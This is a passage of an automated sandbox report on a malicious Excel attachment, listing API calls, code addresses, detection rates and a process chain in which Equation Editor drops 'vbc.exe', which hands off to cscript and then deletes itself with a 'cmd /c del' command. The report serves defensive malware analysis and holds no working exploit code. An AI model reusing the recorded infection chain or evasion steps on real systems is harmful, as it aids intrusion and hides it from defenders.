          Source: C:\Users\Public\vbc.exeCode function: 5_2_007FA37B5_2_007FA37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B73535_2_007B7353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008563BF5_2_008563BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B23055_2_007B2305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007D63DB5_2_007D63DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007AF3CF5_2_007AF3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007ED47D5_2_007ED47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083443E5_2_0083443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C14895_2_007C1489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E54855_2_007E5485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007F65405_2_007F6540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B351F5_2_007B351F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026B12387_2_026B1238
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0260E2E97_2_0260E2E9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0265A37B7_2_0265A37B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026173537_2_02617353
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026123057_2_02612305
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0260F3CF7_2_0260F3CF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026363DB7_2_026363DB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026B63BF7_2_026B63BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026130407_2_02613040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0262905A7_2_0262905A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0263D0057_2_0263D005
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0260E0C67_2_0260E0C6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026B26227_2_026B2622
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0265A6347_2_0265A634
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0261E6C17_2_0261E6C1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026146807_2_02614680
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026457C37_2_026457C3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0261C7BC7_2_0261C7BC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0269579A7_2_0269579A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0264D47D7_2_0264D47D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026454857_2_02645485
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026214897_2_02621489
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026565407_2_02656540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0261351F7_2_0261351F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0262C5F07_2_0262C5F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026C3A837_2_026C3A83
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02637B007_2_02637B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0269DBDA7_2_0269DBDA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0260FBD77_2_0260FBD7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026BCBA47_2_026BCBA4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0263286D7_2_0263286D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0261C85C7_2_0261C85C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026AF8EE7_2_026AF8EE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026959557_2_02695955
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026269FE7_2_026269FE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026129B27_2_026129B2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026B098E7_2_026B098E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0262EE4C7_2_0262EE4C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02642E2F7_2_02642E2F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0263DF7C7_2_0263DF7C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02620F3F7_2_02620F3F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0261CD5B7_2_0261CD5B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02640D3B7_2_02640D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026AFDDD7_2_026AFDDD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008C0D97_2_0008C0D9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008C45D7_2_0008C45D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008C75C7_2_0008C75C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008C9857_2_0008C985
          Source: C:\Users\Public\vbc.exeCode function: String function: 007F3F92 appears 39 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007ADF5C appears 39 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007F373B appears 74 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0260E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0265373B appears 238 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 02653F92 appears 108 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0267F970 appears 81 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0260DF5C appears 118 times
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004185F0 NtCreateFile,5_2_004185F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004186A0 NtReadFile,5_2_004186A0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418720 NtClose,5_2_00418720
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,5_2_004187D0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004185EE NtCreateFile,5_2_004185EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041871C NtClose,5_2_0041871C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0078 NtResumeThread,LdrInitializeThunk,5_2_007A0078
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_007A0048
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A00C4 NtCreateFile,LdrInitializeThunk,5_2_007A00C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A07AC NtCreateMutant,LdrInitializeThunk,5_2_007A07AC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F900 NtReadFile,LdrInitializeThunk,5_2_0079F900
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F9F0 NtClose,LdrInitializeThunk,5_2_0079F9F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0079FAE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0079FAD0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0079FB68
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0079FBB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0079FC60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0079FC90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0079FDC0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FD8C NtDelayExecution,LdrInitializeThunk,5_2_0079FD8C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0079FED0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0079FEA0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FFB4 NtCreateSection,LdrInitializeThunk,5_2_0079FFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0060 NtQuerySection,5_2_007A0060
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A10D0 NtOpenProcessToken,5_2_007A10D0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A1148 NtOpenThread,5_2_007A1148
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A010C NtOpenDirectoryObject,5_2_007A010C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A01D4 NtSetValueKey,5_2_007A01D4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026000C4 NtCreateFile,LdrInitializeThunk,7_2_026000C4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026007AC NtCreateMutant,LdrInitializeThunk,7_2_026007AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_025FFAD0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_025FFAE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFAB8 NtQueryValueKey,LdrInitializeThunk,7_2_025FFAB8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFB50 NtCreateKey,LdrInitializeThunk,7_2_025FFB50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_025FFB68
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_025FFBB8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FF900 NtReadFile,LdrInitializeThunk,7_2_025FF900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FF9F0 NtClose,LdrInitializeThunk,7_2_025FF9F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_025FFED0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFFB4 NtCreateSection,LdrInitializeThunk,7_2_025FFFB4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFC60 NtMapViewOfSection,LdrInitializeThunk,7_2_025FFC60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_025FFDC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFD8C NtDelayExecution,LdrInitializeThunk,7_2_025FFD8C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02600060 NtQuerySection,7_2_02600060
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02600078 NtResumeThread,7_2_02600078
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02600048 NtProtectVirtualMemory,7_2_02600048
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026010D0 NtOpenProcessToken,7_2_026010D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02601148 NtOpenThread,7_2_02601148
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0260010C NtOpenDirectoryObject,7_2_0260010C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_026001D4 NtSetValueKey,7_2_026001D4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFA50 NtEnumerateValueKey,7_2_025FFA50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFA20 NtQueryInformationFile,7_2_025FFA20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFBE8 NtQueryVirtualMemory,7_2_025FFBE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FF8CC NtWaitForSingleObject,7_2_025FF8CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02601930 NtSetContextThread,7_2_02601930
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FF938 NtWriteFile,7_2_025FF938
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFE24 NtWriteVirtualMemory,7_2_025FFE24
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFEA0 NtReadVirtualMemory,7_2_025FFEA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFF34 NtQueueApcThread,7_2_025FFF34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFFFC NtCreateProcessEx,7_2_025FFFFC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFC48 NtSetInformationFile,7_2_025FFC48
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02600C40 NtGetContextThread,7_2_02600C40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFC30 NtOpenProcess,7_2_025FFC30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFC90 NtUnmapViewOfSection,7_2_025FFC90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_025FFD5C NtEnumerateKey,7_2_025FFD5C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02601D80 NtSuspendThread,7_2_02601D80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_000885F0 NtCreateFile,7_2_000885F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_000886A0 NtReadFile,7_2_000886A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00088720 NtClose,7_2_00088720
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_000887D0 NtAllocateVirtualMemory,7_2_000887D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_000885EE NtCreateFile,7_2_000885EE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008871C NtClose,7_2_0008871C
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: Vecchio debito_SKTGH_465585484754.xlsxVirustotal: Detection: 39%
          Source: Vecchio debito_SKTGH_465585484754.xlsxReversingLabs: Detection: 32%
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Vecchio debito_SKTGH_465585484754.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD8A2.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/20@4/4
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: vbc[1].exe.2.dr, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: vbc[1].exe.2.dr, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: vbc.exe.2.dr, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: vbc.exe.2.dr, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.vbc.exe.ff0000.1.unpack, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.vbc.exe.ff0000.1.unpack, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.0.vbc.exe.ff0000.0.unpack, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.0.vbc.exe.ff0000.0.unpack, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: 5.0.vbc.exe.ff0000.4.unpack, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: 5.0.vbc.exe.ff0000.4.unpack, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: 5.2.vbc.exe.ff0000.5.unpack, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: 5.2.vbc.exe.ff0000.5.unpack, dz/yV.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.477475563.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.514399498.0000000000910000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.478435499.0000000000600000.00000004.00000800.00020000.00000000.sdmp, cscript.exe
          Source: Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CharUnicodeIn.pdb source: vbc.exe
          Source: Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: vbc[1].exe.2.dr, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: vbc.exe.2.dr, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.vbc.exe.ff0000.1.unpack, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.vbc.exe.ff0000.0.unpack, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.vbc.exe.ff0000.4.unpack, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.vbc.exe.ff0000.5.unpack, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.vbc.exe.ff0000.6.unpack, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.vbc.exe.ff0000.2.unpack, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.vbc.exe.ff0000.10.unpack, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.vbc.exe.ff0000.3.unpack, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.vbc.exe.ff0000.1.unpack, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.vbc.exe.ff0000.0.unpack, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.vbc.exe.ff0000.8.unpack, Ng/fa.cs.Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: vbc[1].exe.2.dr, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: vbc.exe.2.dr, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 4.2.vbc.exe.ff0000.1.unpack, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 4.0.vbc.exe.ff0000.0.unpack, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 5.0.vbc.exe.ff0000.4.unpack, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 5.2.vbc.exe.ff0000.5.unpack, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 5.0.vbc.exe.ff0000.6.unpack, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 5.0.vbc.exe.ff0000.2.unpack, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 5.0.vbc.exe.ff0000.10.unpack, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 5.0.vbc.exe.ff0000.3.unpack, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 5.0.vbc.exe.ff0000.1.unpack, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 5.0.vbc.exe.ff0000.0.unpack, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 5.0.vbc.exe.ff0000.8.unpack, dz/yV.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B832 push eax; ret 5_2_0041B838
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8C9 push eax; ret 5_2_0041B8A2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8C9 push eax; ret 5_2_0041B8A2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A14C push edx; iretd 5_2_0041A14D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A9F5 push ss; retf 5_2_0041A9F6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C985 push 2E33947Ah; ret 5_2_0041CBEC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041526B push es; retf 5_2_00415281
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040C30E pushad ; iretd 5_2_0040C30F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CBED push 2E33947Ah; ret 5_2_0041CBEC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D466 push 80958155h; iretd 5_2_0041D477
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415C32 push ecx; ret 5_2_00415C33
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0260DFA1 push ecx; ret 7_2_0260DFB4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A14C push edx; iretd 7_2_0008A14D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008526B push es; retf 7_2_00085281
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0007C30E pushad ; iretd 7_2_0007C30F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008D466 push 80958155h; iretd 7_2_0008D477
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008B7E5 push eax; ret 7_2_0008B838
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008B83B push eax; ret 7_2_0008B8A2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008B832 push eax; ret 7_2_0008B838
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008B89C push eax; ret 7_2_0008B8A2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008B8C9 push eax; ret 7_2_0008B8A2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008B8C9 push eax; ret 7_2_0008B8A2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008C985 push 2E33947Ah; ret 7_2_0008CBEC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008A9F5 push ss; retf 7_2_0008A9F6
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival

          barindex
          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
